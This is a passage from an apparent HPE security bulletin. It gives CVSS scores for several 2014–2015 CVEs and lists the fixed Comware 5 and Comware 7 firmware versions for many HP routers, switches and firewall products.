CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2014-8176
  7.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
  7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

CVE-2015-1788
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

CVE-2015-1789
  3.7 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
  4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

CVE-2015-1790
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-1791
  5.6 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
  6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

CVE-2015-1792
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
  5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

CVE-2015-1793
  6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
  6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

  https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay/?docI

d=emr_na-c01345499

RESOLUTION HPE has released the following software updates to resolve the vulnerabilities in the HP network products including iMC, VCX, Comware 5 and Comware 7.

COMWARE 5 Products

A6600 (Comware 5) - Version: R3303P23
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
HSR6602 (Comware 5) - Version: R3303P23
- HP Network Products
- JC176A HP 6602 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 (Comware 5) - Version: R3303P23
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
MSR20 (Comware 5) - Version: R2514P10
- HP Network Products
- JD432A HP A-MSR20-21 Router
- JD662A HP MSR20-20 Router
- JD663A HP A-MSR20-21 Router
- JD663B HP MSR20-21 Router
- JD664A HP MSR20-40 Router
- JF228A HP MSR20-40 Router
- JF283A HP MSR20-20 Router
MSR20-1X (Comware 5) - Version: R2514P10
- HP Network Products
- JD431A HP MSR20-10 Router
- JD667A HP MSR20-15 IW Multi-Service Router
- JD668A HP MSR20-13 Multi-Service Router
- JD669A HP MSR20-13 W Multi-Service Router
- JD670A HP MSR20-15 A Multi-Service Router
- JD671A HP MSR20-15 AW Multi-Service Router
- JD672A HP MSR20-15 I Multi-Service Router
- JD673A HP MSR20-11 Multi-Service Router
- JD674A HP MSR20-12 Multi-Service Router
- JD675A HP MSR20-12 W Multi-Service Router
- JD676A HP MSR20-12 T1 Multi-Service Router
- JF236A HP MSR20-15-I Router
- JF237A HP MSR20-15-A Router
- JF238A HP MSR20-15-I-W Router
- JF239A HP MSR20-11 Router
- JF240A HP MSR20-13 Router
- JF241A HP MSR20-12 Router
- JF806A HP MSR20-12-T Router
- JF807A HP MSR20-12-W Router
- JF808A HP MSR20-13-W Router
- JF809A HP MSR20-15-A-W Router
- JF817A HP MSR20-15 Router
- JG209A HP MSR20-12-T-W Router (NA)
- JG210A HP MSR20-13-W Router (NA)
MSR 30 (Comware 5) - Version: R2514P10
- HP Network Products
- JD654A HP MSR30-60 POE Multi-Service Router
- JD657A HP MSR30-40 Multi-Service Router
- JD658A HP MSR30-60 Multi-Service Router
- JD660A HP MSR30-20 POE Multi-Service Router
- JD661A HP MSR30-40 POE Multi-Service Router
- JD666A HP MSR30-20 Multi-Service Router
- JF229A HP MSR30-40 Router
- JF230A HP MSR30-60 Router
- JF232A HP RTMSR3040-AC-OVSAS-H3
- JF235A HP MSR30-20 DC Router
- JF284A HP MSR30-20 Router
- JF287A HP MSR30-40 DC Router
- JF801A HP MSR30-60 DC Router
- JF802A HP MSR30-20 PoE Router
- JF803A HP MSR30-40 PoE Router
- JF804A HP MSR30-60 PoE Router
- JG728A HP MSR30-20 TAA-compliant DC Router
- JG729A HP MSR30-20 TAA-compliant Router
MSR 30-16 (Comware 5) - Version: R2514P10
- HP Network Products
- JD659A HP MSR30-16 POE Multi-Service Router
- JD665A HP MSR30-16 Multi-Service Router
- JF233A HP MSR30-16 Router
- JF234A HP MSR30-16 PoE Router
MSR 30-1X (Comware 5) - Version: R2514P10
- HP Network Products
- JF800A HP MSR30-11 Router
- JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr
- JG182A HP MSR30-11E Router
- JG183A HP MSR30-11F Router
- JG184A HP MSR30-10 DC Router
MSR 50 (Comware 5) - Version: R2514P10
- HP Network Products
- JD433A HP MSR50-40 Router
- JD653A HP MSR50 Processor Module
- JD655A HP MSR50-40 Multi-Service Router
- JD656A HP MSR50-60 Multi-Service Router
- JF231A HP MSR50-60 Router
- JF285A HP MSR50-40 DC Router
- JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply
MSR 50-G2 (Comware 5) - Version: R2514P10
- HP Network Products
- JD429A HP MSR50 G2 Processor Module
- JD429B HP MSR50 G2 Processor Module
MSR 9XX (Comware 5) - Version: R2514P10
- HP Network Products
- JF812A HP MSR900 Router
- JF813A HP MSR920 Router
- JF814A HP MSR900-W Router
- JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr
- JG207A HP MSR900-W Router (NA)
- JG208A HP MSR920-W Router (NA)
MSR 93X (Comware 5) - Version: R2514P10
- HP Network Products
- JG511A HP MSR930 Router
- JG511B HP MSR930 Router
- JG512A HP MSR930 Wireless Router
- JG513A HP MSR930 3G Router
- JG513B HP MSR930 3G Router
- JG514A HP MSR931 Router
- JG514B HP MSR931 Router
- JG515A HP MSR931 3G Router
- JG516A HP MSR933 Router
- JG517A HP MSR933 3G Router
- JG518A HP MSR935 Router
- JG518B HP MSR935 Router
- JG519A HP MSR935 Wireless Router
- JG520A HP MSR935 3G Router
- JG531A HP MSR931 Dual 3G Router
- JG531B HP MSR931 Dual 3G Router
- JG596A HP MSR930 4G LTE/3G CDMA Router
- JG597A HP MSR936 Wireless Router
- JG665A HP MSR930 4G LTE/3G WCDMA Global Router
- JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
- JH009A HP MSR931 Serial (TI) Router
- JH010A HP MSR933 G.SHDSL (TI) Router
- JH011A HP MSR935 ADSL2+ (TI) Router
- JH012A HP MSR930 Wireless 802.11n (NA) Router
- JH012B HP MSR930 Wireless 802.11n (NA) Router
- JH013A HP MSR935 Wireless 802.11n (NA) Router
MSR1000 (Comware 5) - Version: R2514P10
- HP Network Products
- JG732A HP MSR1003-8 AC Router
12500 (Comware 5) - Version: R1829P01
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JC808A HP 12500 TAA Main Processing Unit
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
9500E (Comware 5) - Version: R1829P01
- HP Network Products
- JC124A HP A9508 Switch Chassis
- JC124B HP 9505 Switch Chassis
- JC125A HP A9512 Switch Chassis
- JC125B HP 9512 Switch Chassis
- JC474A HP A9508-V Switch Chassis
- JC474B HP 9508-V Switch Chassis
10500 (Comware 5) - Version: R1210P01
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC614A HP 10500 Main Processing Unit
- JC748A HP 10512 Switch Chassis
- JG375A HP 10500 TAA-compliant Main Processing Unit
- JG820A HP 10504 TAA-compliant Switch Chassis
- JG821A HP 10508 TAA-compliant Switch Chassis
- JG822A HP 10508-V TAA-compliant Switch Chassis
- JG823A HP 10512 TAA-compliant Switch Chassis
7500 (Comware 5) - Version: R6710P01
- HP Network Products
- JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo
- JC697A HP 7502 TAA-compliant Main Processing Unit
- JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports
- JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports
- JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit
- JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit
- JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD194A HP 7500 384Gbps Fabric Module
- JD194B HP 7500 384Gbps Fabric Module
- JD195A HP 7500 384Gbps Advanced Fabric Module
- JD196A HP 7502 Fabric Module
- JD220A HP 7500 768Gbps Fabric Module
- JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports
- JD238A HP 7510 Switch Chassis
- JD238B HP 7510 Switch Chassis
- JD239A HP 7506 Switch Chassis
- JD239B HP 7506 Switch Chassis
- JD240A HP 7503 Switch Chassis
- JD240B HP 7503 Switch Chassis
- JD241A HP 7506-V Switch Chassis
- JD241B HP 7506-V Switch Chassis
- JD242A HP 7502 Switch Chassis
- JD242B HP 7502 Switch Chassis
- JD243A HP 7503-S Switch Chassis with 1 Fabric Slot
- JD243B HP 7503-S Switch Chassis with 1 Fabric Slot
- JE164A HP E7902 Switch Chassis
- JE165A HP E7903 Switch Chassis
- JE166A HP E7903 1 Fabric Slot Switch Chassis
- JE167A HP E7906 Switch Chassis
- JE168A HP E7906 Vertical Switch Chassis
- JE169A HP E7910 Switch Chassis
5830 (Comware 5) - Version: R1118P13
- HP Network Products
- JC691A HP 5830AF-48G Switch with 1 Interface Slot
- JC694A HP 5830AF-96G Switch
- JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot
- JG374A HP 5830AF-96G TAA-compliant Switch
5800 (Comware 5) - Version: R1809P11
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
5500 HI (Comware 5) - Version: R5501P17
- HP Network Products
- JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots
- JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots
- JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots
- JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
5500 EI (Comware 5) - Version: R2221P19
- HP Network Products
- JD373A HP 5500-24G DC EI Switch
- JD374A HP 5500-24G-SFP EI Switch
- JD375A HP 5500-48G EI Switch
- JD376A HP 5500-48G-PoE EI Switch
- JD377A HP 5500-24G EI Switch
- JD378A HP 5500-24G-PoE EI Switch
- JD379A HP 5500-24G-SFP DC EI Switch
- JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots
- JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots
- JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface
- JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots
- JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots
- JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
- JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
4800G (Comware 5) - Version: R2221P19
- HP Network Products
- JD007A HP 4800-24G Switch
- JD008A HP 4800-24G-PoE Switch
- JD009A HP 4800-24G-SFP Switch
- JD010A HP 4800-48G Switch
- JD011A HP 4800-48G-PoE Switch
5500SI (Comware 5) - Version: R2221P20
- HP Network Products
- JD369A HP 5500-24G SI Switch
- JD370A HP 5500-48G SI Switch
- JD371A HP 5500-24G-PoE SI Switch
- JD372A HP 5500-48G-PoE SI Switch
- JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots
- JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
4500G (Comware 5) - Version: R2221P20
- HP Network Products
- JF428A HP 4510-48G Switch
- JF847A HP 4510-24G Switch
5120 EI (Comware 5) - Version: R2221P20
- HP Network Products
- JE066A HP 5120-24G EI Switch
- JE067A HP 5120-48G EI Switch
- JE068A HP 5120-24G EI Switch with 2 Interface Slots
- JE069A HP 5120-48G EI Switch with 2 Interface Slots
- JE070A HP 5120-24G-PoE EI 2-slot Switch
- JE071A HP 5120-48G-PoE EI 2-slot Switch
- JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots
- JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots
- JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots
- JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots
- JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots
- JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
4210G (Comware 5) - Version: R2221P20
- HP Network Products
- JF844A HP 4210-24G Switch
- JF845A HP 4210-48G Switch
- JF846A HP 4210-24G-PoE Switch
5120 SI (Comware 5) - Version: R1516
- HP Network Products
- JE072A HP 5120-48G SI Switch
- JE072B HPE 5120 48G SI Switch
- JE073A HP 5120-16G SI Switch
- JE073B HPE 5120 16G SI Switch
- JE074A HP 5120-24G SI Switch
- JE074B HPE 5120 24G SI Switch
- JG091A HP 5120-24G-PoE+ (370W) SI Switch
- JG091B HPE 5120 24G PoE+ (370W) SI Switch
- JG092A HP 5120-24G-PoE+ (170W) SI Switch
- JG309B HPE 5120 8G PoE+ (180W) SI Switch
- JG310B HPE 5120 8G PoE+ (65W) SI Switch
3610 (Comware 5) - Version: R5319P14
- HP Network Products
- JD335A HP 3610-48 Switch
- JD336A HP 3610-24-4G-SFP Switch
- JD337A HP 3610-24-2G-2G-SFP Switch
- JD338A HP 3610-24-SFP Switch
3600V2 (Comware 5) - Version: R2110P06
- HP Network Products
- JG299A HP 3600-24 v2 EI Switch
- JG299B HP 3600-24 v2 EI Switch
- JG300A HP 3600-48 v2 EI Switch
- JG300B HP 3600-48 v2 EI Switch
- JG301A HP 3600-24-PoE+ v2 EI Switch
- JG301B HP 3600-24-PoE+ v2 EI Switch
- JG301C HP 3600-24-PoE+ v2 EI Switch
- JG302A HP 3600-48-PoE+ v2 EI Switch
- JG302B HP 3600-48-PoE+ v2 EI Switch
- JG302C HP 3600-48-PoE+ v2 EI Switch
- JG303A HP 3600-24-SFP v2 EI Switch
- JG303B HP 3600-24-SFP v2 EI Switch
- JG304A HP 3600-24 v2 SI Switch
- JG304B HP 3600-24 v2 SI Switch
- JG305A HP 3600-48 v2 SI Switch
- JG305B HP 3600-48 v2 SI Switch
- JG306A HP 3600-24-PoE+ v2 SI Switch
- JG306B HP 3600-24-PoE+ v2 SI Switch
- JG306C HP 3600-24-PoE+ v2 SI Switch
- JG307A HP 3600-48-PoE+ v2 SI Switch
- JG307B HP 3600-48-PoE+ v2 SI Switch
- JG307C HP 3600-48-PoE+ v2 SI Switch
3100V2-48 (Comware 5) - Version: R2110P06
- HP Network Products
- JG315A HP 3100-48 v2 Switch
- JG315B HP 3100-48 v2 Switch
HP870 (Comware 5) - Version: R2607P46
- HP Network Products
- JG723A HP 870 Unified Wired-WLAN Appliance
- JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
HP850 (Comware 5) - Version: R2607P46
- HP Network Products
- JG722A HP 850 Unified Wired-WLAN Appliance
- JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
HP830 (Comware 5) - Version: R3507P46
- HP Network Products
- JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch
- JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch
- JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch
- JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
HP6000 (Comware 5) - Version: R2507P46
- HP Network Products
- JG639A HP 10500/7500 20G Unified Wired-WLAN Module
- JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
WX5004-EI (Comware 5) - Version: R2507P46
- HP Network Products
- JD447B HP WX5002 Access Controller
- JD448A HP WX5004 Access Controller
- JD448B HP WX5004 Access Controller
- JD469A HP WX5004 Access Controller
SecBlade FW (Comware 5) - Version: R3181P07
- HP Network Products
- JC635A HP 12500 VPN Firewall Module
- JD245A HP 9500 VPN Firewall Module
- JD249A HP 10500/7500 Advanced VPN Firewall Module
- JD250A HP 6600 Firewall Processing Router Module
- JD251A HP 8800 Firewall Processing Module
- JD255A HP 5820 VPN Firewall Module
F1000-E (Comware 5) - Version: R3181P07
- HP Network Products
- JD272A HP F1000-E VPN Firewall Appliance
F1000-A-EI (Comware 5) - Version: R3734P08
- HP Network Products
- JG214A HP F1000-A-EI VPN Firewall Appliance
F1000-S-EI (Comware 5) - Version: R3734P08
- HP Network Products
- JG213A HP F1000-S-EI VPN Firewall Appliance
F5000-A (Comware 5) - Version: F3210P26
- HP Network Products
- JD259A HP A5000-A5 VPN Firewall Chassis
- JG215A HP F5000 Firewall Main Processing Unit
- JG216A HP F5000 Firewall Standalone Chassis
U200S and CS (Comware 5) - Version: F5123P33
- HP Network Products
- JD273A HP U200-S UTM Appliance
U200A and M (Comware 5) - Version: F5123P33
- HP Network Products
- JD275A HP U200-A UTM Appliance
F5000-C/S (Comware 5) - Version: R3811P05
- HP Network Products
- JG650A HP F5000-C VPN Firewall Appliance
- JG370A HP F5000-S VPN Firewall Appliance
SecBlade III (Comware 5) - Version: R3820P06
- HP Network Products
- JG371A HP 12500 20Gbps VPN Firewall Module
- JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
6600 RSE RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
6600 RPE RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU
- HP Network Products
- JC165A) HP 6600 RPE-X1 Router Module
- JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit
6602 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU
- HP Network Products
- JC176A) HP 6602 Router Chassis
HSR6602 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU
- HP Network Products
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
HSR6800 RU (Comware 5 Low Encryption SW) - Version: R3303P23-RU
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
SMB1910 (Comware 5) - Version: R1111
- HP Network Products
- JG540A HP 1910-48 Switch
- JG539A HP 1910-24-PoE+ Switch
- JG538A HP 1910-24 Switch
- JG537A HP 1910-8 -PoE+ Switch
- JG536A HP 1910-8 Switch
SMB1920 (Comware 5) - Version: R1109
- HP Network Products
- JG928A HP 1920-48G-PoE+ (370W) Switch
- JG927A HP 1920-48G Switch
- JG926A HP 1920-24G-PoE+ (370W) Switch
- JG925A HP 1920-24G-PoE+ (180W) Switch
- JG924A HP 1920-24G Switch
- JG923A HP 1920-16G Switch
- JG922A HP 1920-8G-PoE+ (180W) Switch
- JG921A HP 1920-8G-PoE+ (65W) Switch
- JG920A HP 1920-8G Switch
V1910 (Comware 5) - Version: R1516
- HP Network Products
- JE005A HP 1910-16G Switch
- JE006A HP 1910-24G Switch
- JE007A HP 1910-24G-PoE (365W) Switch
- JE008A HP 1910-24G-PoE(170W) Switch
- JE009A HP 1910-48G Switch
- JG348A HP 1910-8G Switch
- JG349A HP 1910-8G-PoE+ (65W) Switch
- JG350A HP 1910-8G-PoE+ (180W) Switch
SMB 1620 (Comware 5) - Version: R1108
- HP Network Products
- JG914A HP 1620-48G Switch
- JG913A HP 1620-24G Switch
- JG912A HP 1620-8G Switch

COMWARE 7 Products

12500 (Comware 7) - Version: R7376
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
10500 (Comware 7) - Version: R7170
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC748A HP 10512 Switch Chassis
- JG608A HP FlexFabric 11908-V Switch Chassis
- JG609A HP FlexFabric 11900 Main Processing Unit
- JG820A HP 10504 TAA Switch Chassis
- JG821A HP 10508 TAA Switch Chassis
- JG822A HP 10508-V TAA Switch Chassis
- JG823A HP 10512 TAA Switch Chassis
- JG496A HP 10500 Type A MPU w/Comware v7 OS
- JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System
- JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System Main Processing Unit
12900 (Comware 7) - Version: R1138P01
- HP Network Products
- JG619A HP FlexFabric 12910 Switch AC Chassis
- JG621A HP FlexFabric 12910 Main Processing Unit
- JG632A HP FlexFabric 12916 Switch AC Chassis
- JG634A HP FlexFabric 12916 Main Processing Unit
- JH104A HP FlexFabric 12900E Main Processing Unit
- JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit
- JH263A HP FlexFabric 12904E Main Processing Unit
- JH255A HP FlexFabric 12908E Switch Chassis
- JH262A HP FlexFabric 12904E Switch Chassis
- JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis
- JH103A HP FlexFabric 12916E Switch Chassis
5900 (Comware 7) - Version: R2422P01
- HP Network Products
- JC772A HP 5900AF-48XG-4QSFP+ Switch
- JG296A HP 5920AF-24XG Switch
- JG336A HP 5900AF-48XGT-4QSFP+ Switch
- JG510A HP 5900AF-48G-4XG-2QSFP+ Switch
- JG554A HP 5900AF-48XG-4QSFP+ TAA Switch
- JG555A HP 5920AF-24XG TAA Switch
- JG838A HP FF 5900CP-48XG-4QSFP+ Switch
- JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant
- JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch
- JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
MSR1000 (Comware 7) - Version: R0305P04
- HP Network Products
- JG875A HP MSR1002-4 AC Router
- JH060A HP MSR1003-8S AC Router
MSR2000 (Comware 7) - Version: R0305P04
- HP Network Products
- JG411A HP MSR2003 AC Router
- JG734A HP MSR2004-24 AC Router
- JG735A HP MSR2004-48 Router
- JG866A HP MSR2003 TAA-compliant AC Router
MSR3000 (Comware 7) - Version: R0305P04
- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
MSR4000 (Comware 7) - Version: R0305P04
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
VSR (Comware 7) - Version: E0321P01
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
7900 (Comware 7) - Version: R2138P01
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
5130 (Comware 7) - Version: R3109P16
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
